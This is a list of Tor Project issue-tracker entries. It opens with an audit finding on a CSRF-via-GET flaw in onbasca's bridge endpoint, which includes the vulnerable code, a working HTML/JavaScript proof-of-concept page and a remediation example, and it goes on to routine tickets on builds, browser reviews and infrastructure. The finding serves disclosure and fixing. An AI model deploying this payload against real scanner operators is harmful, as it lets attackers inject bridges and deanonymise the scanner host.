The Tor Project issues
https://gitlab.torproject.org/groups/tpo/-/issues
Updated: 2023-10-19T15:40:40Z

TOR-008 Pen-torproject#8: onbasca - CSRF via GET allows adding bridges on production configuration
https://gitlab.torproject.org/tpo/network-health/onbasca/-/issues/162
Updated: 2023-10-19T15:40:40Z; author: juga

The [commit](https://gitlab.torproject.org/tpo/network-health/onbasca/-/merge_requests/71/diffs?commit_id=ba028464b794a68764cafec6a5f6e93c2aa50044#b0c9b1e7215ec336ecacb37431093a273ed77fb2) did not fix the vulnerability because the bridge line is still passed via HTTP GET, which prevents Django middleware's CSRF protection from taking effect.
The Onion Bandwidth Scanner (onbasca) suffers from a Cross-Site Request Forgery (CSRF) vulnerability via HTTP GET. As a result, unauthenticated attackers (no onbasca credentials are needed) can inject bridges into the database by luring an operator's browser to a malicious page.
Threat level: High
Technical description:
The create_bridges view is exempt from CSRF checks (@csrf_exempt) and only accepts HTTP GET requests. It reads the bridge lines from the query string (request.GET, or from a JSON body) into bridge_lines and stores each of them in the database via the _create_bridge function. Because the endpoint is GET-only, nothing ties the request to the operator's session: any web page the operator's browser visits can make that browser issue the request.
In tpo/network-health/onbasca/onbrisca/views.py:
```python
@csrf_exempt
def create_bridges(request):
    [...]
    if not request.method == "GET":
        return JsonResponse(response_data, status=403)  # Forbidden
    if request.content_type == "application/json":
        data = json.loads(request.body)
    else:
        data = dict(request.GET)
    bridge_lines = data.get("bridge_lines", None)
    [...]
    for bridge_line in bridge_lines:
        bridge_result = _create_bridge(bridge_line, mu, muf, bridge_ratio)
    [...]
    return response
```
The bridgescan management command measures the bandwidth of the bridges stored in the database. It is not only run by hand: onbasca ships a bridgescan daemon as a systemd service file during installation, so the scan runs regularly and unattended, and every bridge in the database gets picked up.
In tpo/network-health/onbasca/onbrisca/management/commands/bridgescan.py:
```python
class Command(OnbascaCommand):
    def handle(self, *args, **options):
        scanner = BridgeScanner.load()
        scanner.init(port=config.EXTERNAL_CONTROL_PORT)
        scanner.run()
```
During the scan, the set_bridgelines method receives the bridges selected from the database, including any the attacker injected, converts them to tor bridge lines and pushes every line that is not already configured into the scanner's tor instance with SETCONF Bridge, then enables UseBridges. From that point on the scanner's tor client treats the injected bridge as a valid entry point and opens a direct TCP connection to the attacker-controlled address.
In tpo/network-health/onbasca/onbrisca/bridge_torcontrol.py:
```python
class BridgeTorControl(TorControl):
    def set_bridgelines(self, bridges):
        bridgelines = Bridge.objects.bridgelines_from_bridges(bridges)
        # Fetch the bridges that are already configured first, so duplicates are not set
        tor_bridgelines = self.controller.get_conf("Bridge", multiple=True)
        new_bridgelines = set(bridgelines).difference(set(tor_bridgelines))
        if new_bridgelines:
            self.controller.set_conf("Bridge", new_bridgelines)
            self.controller.set_conf("UseBridges", "1")
```
Proof of Concept:
The page below, served from any attacker-controlled origin, makes the victim's browser issue the GET request against a local onbasca instance. A cross-origin GET without custom headers is a "simple request", so the browser sends it without a CORS preflight; the page cannot read the response, but it does not need to, because the server has already processed the request by then.
```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Nothing to see here :)</title>
</head>
<body>
<script>
  async function poc() {
    try {
      // mode "no-cors" makes fetch resolve with an opaque response instead of throwing
      // on the missing CORS headers; the request reaches the server either way.
      await fetch("http://127.0.0.1:8000/bridge-state/?bridge_lines=obfs4+0.0.0.0%3A00000+AAA+cert%3D0+iat-mode%3D0",
                  { mode: "no-cors" });
      alert("request sent");
    } catch (error) {
      alert("error");
      console.error("There has been a problem with your fetch operation:", error);
    }
  }
</script>
<input type="button" value="RUN POC!" onclick="poc()"/>
</body>
</html>
```
Impact:
An attacker can lure a Directory Authority operator to a malicious page and perform the CSRF attack whenever the victim's browser can reach the onbasca instance, for example when the operator uses the Django web interface from the same host or network (the PoC targets http://127.0.0.1:8000). As a result, unauthenticated attackers can inject attacker-controlled bridge lines (IP addresses and fingerprints) into the database. When the bridgescan command runs, which it does regularly via the systemd service, onbasca's tor instance connects directly to the attacker-controlled bridge. The attacker thereby learns the IP address of the scanner host, can throttle or drop the scanner's traffic and influence the bandwidth measured for that bridge, and may use this foothold for further attacks.
Since onbasca is similar to the bandwidth scanner implementation of sbws, it's highly likely that onbasca is also affected by finding TOR-028.
Recommendation:
- Accept the bridge lines only from the body of a POST request (request.POST, or the JSON body when the content type is application/json) and reject every other method, e.g. with Django's require_POST decorator. This is the step that matters: Django's CsrfViewMiddleware only validates POST, PUT, PATCH and DELETE requests and lets GET, HEAD, OPTIONS and TRACE through untouched, so a GET endpoint stays unprotected even after the decorator is removed.
- Then remove the @csrf_exempt decorator.
- Finally, make sure django.middleware.csrf.CsrfViewMiddleware is listed in MIDDLEWARE (it is part of Django's default settings) and that legitimate clients send the token: the csrfmiddlewaretoken form field, or the X-CSRFToken header for JSON requests.
- Verify the fix by replaying the PoC: the GET must be rejected, and a cross-site POST without a valid token must get a 403 from the middleware.
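The request handling the recommendation asks for, as an added example that is neither onbasca's code nor part of the auditor's report. Django is replaced by minimal stand-ins so it runs offline: Request, csrf_check, parse_bridge_line, BRIDGE_LINE_RE and the sample requests are hypothetical names constructed for this example. csrf_check keeps only the two rules that matter here (safe methods are never checked, unsafe methods need a token matching the csrftoken cookie); a real deployment must use CsrfViewMiddleware, which additionally masks tokens and checks Origin/Referer. The bridge-line validator is defence in depth on top of CSRF protection, and its requirement of a fingerprint is this example's policy, not tor's.

```python
# Added example, not onbasca's code: POST-only view + CSRF check + bridge-line validation,
# with django.http.HttpRequest and the CSRF middleware replaced by hypothetical stand-ins.
import hmac
import json
import re
import secrets
from dataclasses import dataclass, field

# Django's CsrfViewMiddleware accepts these methods without any check, which is why the
# GET-only view could not be protected no matter which decorators it carried.
SAFE_METHODS = ("GET", "HEAD", "OPTIONS", "TRACE")

# "[transport] host:port fingerprint [key=value ...]". Requiring the 40-hex fingerprint
# is this example's policy (assumption); tor itself also accepts lines without one.
BRIDGE_LINE_RE = re.compile(
    r"^(?:(?P<transport>[a-z0-9_]+)\s+)?"
    r"(?P<host>\[?[0-9a-fA-F.:]+\]?):(?P<port>\d{1,5})\s+"
    r"(?P<fp>[0-9A-Fa-f]{40})"
    r"(?P<args>(?:\s+[A-Za-z0-9_-]+=\S+)*)\s*$"
)


@dataclass
class Request:  # stand-in with just the attributes the view touches
    method: str
    GET: dict = field(default_factory=dict)
    POST: dict = field(default_factory=dict)
    body: bytes = b""
    content_type: str = "application/x-www-form-urlencoded"
    COOKIES: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


def csrf_check(request):
    """Return None when the request passes, else (status, reason)."""
    if request.method in SAFE_METHODS:
        return None
    cookie = request.COOKIES.get("csrftoken", "")
    token = request.POST.get("csrfmiddlewaretoken") or request.headers.get("X-CSRFToken", "")
    if not cookie or not token or not hmac.compare_digest(cookie, token):
        return 403, "CSRF token missing or incorrect"
    return None


def parse_bridge_line(line):
    """Return (transport, host, port, fingerprint) or raise ValueError."""
    m = BRIDGE_LINE_RE.match(line.strip())
    if not m or not 1 <= int(m.group("port")) <= 65535:
        raise ValueError(f"malformed bridge line: {line!r}")
    return (m.group("transport") or "vanilla", m.group("host"),
            int(m.group("port")), m.group("fp").upper())


def create_bridges(request, db):
    """POST-only replacement for the vulnerable view; db is a list standing in for the ORM."""
    if request.method != "POST":                     # what require_POST does
        return 405, {"error": "method not allowed"}
    rejected = csrf_check(request)                   # what CsrfViewMiddleware does
    if rejected:
        return rejected[0], {"error": rejected[1]}
    if request.content_type == "application/json":
        lines = json.loads(request.body).get("bridge_lines", [])
    else:
        lines = request.POST.get("bridge_lines", [])
    parsed = []
    for line in lines:
        try:
            parsed.append(parse_bridge_line(line))
        except ValueError as exc:
            return 400, {"error": str(exc)}
    db.extend(parsed)
    return 201, {"created": len(parsed)}


# Constructed inputs: the PoC's placeholder line and a well-formed obfs4 line (TEST-NET address).
POC_LINE = "obfs4 0.0.0.0:00000 AAA cert=0 iat-mode=0"
GOOD_LINE = "obfs4 192.0.2.10:443 0123456789ABCDEF0123456789ABCDEF01234567 cert=AAAA iat-mode=0"


def attacker_get(line=POC_LINE):
    """What the PoC page makes the victim's browser send: a bare cross-site GET."""
    return Request("GET", GET={"bridge_lines": [line]})


def attacker_post(line=POC_LINE):
    """Cross-site form POST: the cookie may ride along, but the attacker cannot read it to echo it."""
    return Request("POST", POST={"bridge_lines": [line]}, COOKIES={"csrftoken": "victim-token"})


def operator_post(line=GOOD_LINE, as_json=False):
    """Legitimate same-origin request: token in the form body, or X-CSRFToken for JSON."""
    tok = secrets.token_hex(16)
    if as_json:
        return Request("POST", body=json.dumps({"bridge_lines": [line]}).encode(),
                       content_type="application/json", COOKIES={"csrftoken": tok},
                       headers={"X-CSRFToken": tok})
    return Request("POST", POST={"bridge_lines": [line], "csrfmiddlewaretoken": tok},
                   COOKIES={"csrftoken": tok})


if __name__ == "__main__":
    db = []
    for req in (attacker_get(), attacker_post(), operator_post(), operator_post(as_json=True)):
        print(req.method, req.content_type, "->", create_bridges(req, db))
```

Run as a script, the attacker's GET is answered 405 and the cross-site POST 403 before any bridge line is looked at, while the operator's form and JSON requests are stored (201). The same operator request carrying the PoC's placeholder line fails validation with 400, which is the defence-in-depth layer: it does not replace the CSRF fix, since a well-formed attacker bridge line would pass it.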
_Editing to add more information from the auditor's report._
Assignee: juga
Due date: 2023-09-21

Update zlib to 1.3 after 13.0a3
https://gitlab.torproject.org/tpo/applications/tor-browser-build/-/issues/40930
Updated: 2023-10-03T15:38:17Z; author: richard

zlib had an update but we should let it bake in Nightly before yolo'ing into Alpha
https://github.com/madler/zlib/releases
Assignee: richard

Update go to 1.21 series after 13.0a3
https://gitlab.torproject.org/tpo/applications/tor-browser-build/-/issues/40929
Updated: 2023-10-03T13:27:53Z; author: richard

New major go version, let's make sure it builds and works in Nightly before yolo'ing in an Alpha build.
https://golang.org/dl
Assignee: richard

Update tools/torbrowser/ scripts to support macOS dev environment
https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42035
Updated: 2023-10-03T13:27:54Z; author: richard

We have some lovely scripts in `tools/torbrowser` to support building firefox and deploying over a local dev install of Tor Browser. Basically they download the latest alpha and deploy local dev builds of firefox over it with proper tor and PT integration.
The only problem is they assume an x86_64 Linux dev environment!
We should add support for a macOS dev environment.
Assignee: clairehurst

Add metrics for open Invite distribution
https://gitlab.torproject.org/tpo/anti-censorship/lox/-/issues/29
Updated: 2023-10-31T21:21:02Z; author: onyinyang

Further to #28 we should add metrics to measure how quickly we get to k number of users as well as how quickly we get to the maximum buckets distributed (#28) each day so we can better tweak our distribution process.
Assignee: onyinyang

Set daily max bucket distribution and adjust other settings for production
https://gitlab.torproject.org/tpo/anti-censorship/lox/-/issues/28
Updated: 2024-02-15T16:52:09Z; author: onyinyang

We likely need to decide on an upper bound of buckets that can be distributed each day so that we don't run out of open invitation buckets. We currently have buckets being distributed to k users before a new bucket is used, but if buckets are continuously requested, we will eventually run out of buckets each day. These variables should be part of a configuration file for Lox.
Milestone: Lox Ready for Open Testing Call
Assignee: onyinyang

start_conversation doesn't actually send the message to the right hop
https://gitlab.torproject.org/tpo/core/arti/-/issues/1014
Updated: 2023-08-21T13:14:56Z; author: Nick Mathewson

~~see the code for start_conversation: the hop_num goes into the handler, not the Conversation or the message.~~
Ah, never mind. This is taken from the handler.expected_hop().
Assignee: Nick Mathewson

Defense-in-depth: disable non-proxied UDP WebRTC
https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42029
Updated: 2023-10-03T15:38:22Z; author: ma1

Defense-in-depth for base-browser & tor-browser (WebRTC currently disabled), experiment for mullvad-browser where WebRTC is enabled (see https://gitlab.torproject.org/tpo/applications/mullvad-browser/-/issues/151#note_2929915).
Assignee: ma1

Collect prometheus data from Centralized Probe Log(probetelemetry-01@)
https://gitlab.torproject.org/tpo/tpa/team/-/issues/41302
Updated: 2023-08-30T20:36:51Z; author: shelikhoo

In order to create an alert system for log collector, it would be necessary to collect the prometheus data exported from logcollector (https://gitlab.torproject.org/tpo/anti-censorship/connectivity-measurement/logcollector/-/merge_requests/5).
The prometheus listener is present on `http://127.0.0.1:8080/metrics`, and listens on the `127.0.0.1` interface only.
Currently there is only one entry; however, we intend to add more in the future.
Assignee: anarcat

Add note - No PayPal via Tor
https://gitlab.torproject.org/tpo/web/donate-static/-/issues/122
Updated: 2023-09-06T18:18:46Z; author: mattlav

We recently showed that donating to Tor, via PayPal, using the Tor network doesn't work (#81, multiple user messages); according to #120 we will disable the donate.tp.o onion site altogether. In the meantime, we can save visitors a real headache by warning them with some text on the page, by the "How do you want to DONATE?" prompt. Here's my first draft, subject to revision ( @smith ):
`PayPal cannot process donations made via the Tor Network. We apologize for the inconvenience.`

DescriptorParser is failing to create data consistently in VM and the DB
https://gitlab.torproject.org/tpo/network-health/metrics/descriptorParser/-/issues/49
Updated: 2023-09-19T15:28:22Z; author: Hiro

The parser is crashing and/or nooping somewhere.
- [ ] Find why this is happening and apply patch
- [ ] Reprocess the missed days
Assignee: Hiro

Remove popup asking for preferred language on websites
https://gitlab.torproject.org/tpo/applications/mullvad-browser/-/issues/228
Updated: 2023-10-03T13:29:57Z; author: ruihildt

Here's the popup, which displays after switching away from the default language.
_Pardon my french (screenshot)._
![image](/uploads/cc5edd9c39097937103ffd6599354861/image.png)
We suspect it's confusing and most users will click it away anyway, and maybe will take the wrong choice. Research in https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/40414 seems to agree about it.
Moreover, websites aren't reliably using that hint to serve localized content to users and are as likely to base it on IP location.
For these reasons we would like to remove that popup and keep the sane default.
**It is a blocker to have multi-language support in Mullvad Browser.**
Assignee: richard

Review Mozilla 1830890: Keep a history window of WebRTC stats for about:webrtc
https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42015
Updated: 2023-10-05T12:44:53Z; author: richard

Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1830790
We should make sure there's no disk leak here, and if there is, gate it behind private browsing mode and uplift.
Assignee: richard

Review Mozilla 1834374: Do not call EmptyClipboard() in nsBaseClipboard destructor
https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42013
Updated: 2023-12-04T08:05:07Z; author: richard

Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1834374
So this patch is correct in terms of the undefined behaviour aspects: by the time the nsBaseClipboard destructor is called on the object, its implementing class's destructor would have already been called, so calling virtual methods is undefined/broken (since they may touch data that has already been destructed).
Now, we *may* still want to call EmptyClipboard() on destruction (but correctly).
To whoever writes this potential patch, please read up on destruction order/virtual destructors so we don't re-introduce undefined behaviour.
@donuts do you think we would want this behaviour gated on private browsing only mode (clearing clipboard on exit)?
@ma1 can we clear clipboard contents iff the contents were placed there by the browser?
@ruihildt if we do want this in Tor Browser, do you think we would *also* want this in Mullvad Browser? The fix is new in FF115, so iirc the current Mullvad Browser is clearing the clipboard on exit.
Assignee: ma1

Help with VPN CE to DRL
https://gitlab.torproject.org/tpo/team/-/issues/205
Updated: 2023-08-17T13:06:57Z; author: Gaba <gaba@torproject.org>
Assignee: Gaba <gaba@torproject.org>

Add RAM to henryi
https://gitlab.torproject.org/tpo/tpa/team/-/issues/41298
Updated: 2023-08-15T15:01:14Z; author: Tom Ritter <tom@ritter.vg>

It seems like even with no parallel workers I'm still getting some OOM errors. (I can't see dmesg, but the script seems to be being killed.)
Could we increase the RAM (or swap? never did fully understand the interaction...) by a bit and see if that resolves things?
Assignee: anarcat

Review Mozilla 1810641: Enable overscroll on Windows on all channels
https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42010
Updated: 2023-10-05T12:57:01Z; author: richard

Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1810641
@thorin is overscroll something we need to consider re ~Fingerprinting or is it a case where so-long as everyone has it it's fine. Skimming the ticket suggests the overscroll only happens when scrolling via touch.
EDIT: fwiw enabling the provided pref on Linux did not enable any new functionality on my laptop, but libinput is kind of a shitshow w/ regards to touchpad support/functionality so it may just be seeing it a mouse+scroll wheel.
/cc @donuts

Review Mozilla 1817726: Allow sharing current tab URL from Android's Recents (App Overview) screen.
https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/42006
Updated: 2023-10-03T13:28:05Z; author: richard

Link: https://bugzilla.mozilla.org/show_bug.cgi?id=1817726
Hopefully this is properly handling/is disabled in private browsing mode, but we must check.
Assignee: Dan Ballard

Consider a proposal about advertising protocols of intro points, rend points, and onion services
https://gitlab.torproject.org/tpo/core/torspec/-/issues/217
Updated: 2023-10-26T14:19:20Z; author: Nick Mathewson

While writing onion service code in Arti, we're finding places where we'd like the onion client to know the supported protocols of the intro point and onion service, and where we'd like the onion service to know the supported protocols of the rendezvous point.
Currently, the algorithm for Intro points and Rend points is something like,
* Look up the listed relay in your consensus, and use its protocols if you find them.
* Otherwise, use the minimal supported protocols ("required-relay-protocols") listed in the consensus.
For onion services, you can't assume support for _any_ protocol. We _could_ assume that the onion service has the protocols listed in "required-client-protocols", but those are updated as infrequently as possible. When we _do_ need the onion service to advertise support for something new, we have to add a new field in the service descriptor.
I suggest that instead we could write a proposal to do some or all of the following:
1. Encode intro points' protocol lists in the service descriptor
2. Encode rendezvous points' protocol lists in the INTRODUCE2 body
3. Create a new "protocols" line in the onion service descriptor, containing a subset of the onion service's supported protocols.
Assignee: Nick Mathewson

TB13.0a2 android: center text on connect button
https://gitlab.torproject.org/tpo/applications/tor-browser/-/issues/41999
Updated: 2023-10-03T13:28:10Z; author: Thorin

updated from 12.5 series
- connect text on connect button is not centered
moved
- #42023 since I upgraded a version, I got a meatball bull dot for what's new -> firefox release page
- #42024 when I visited the first website, I got a Firefox popup/panel telling me all about ETP
Assignee: Dan Ballard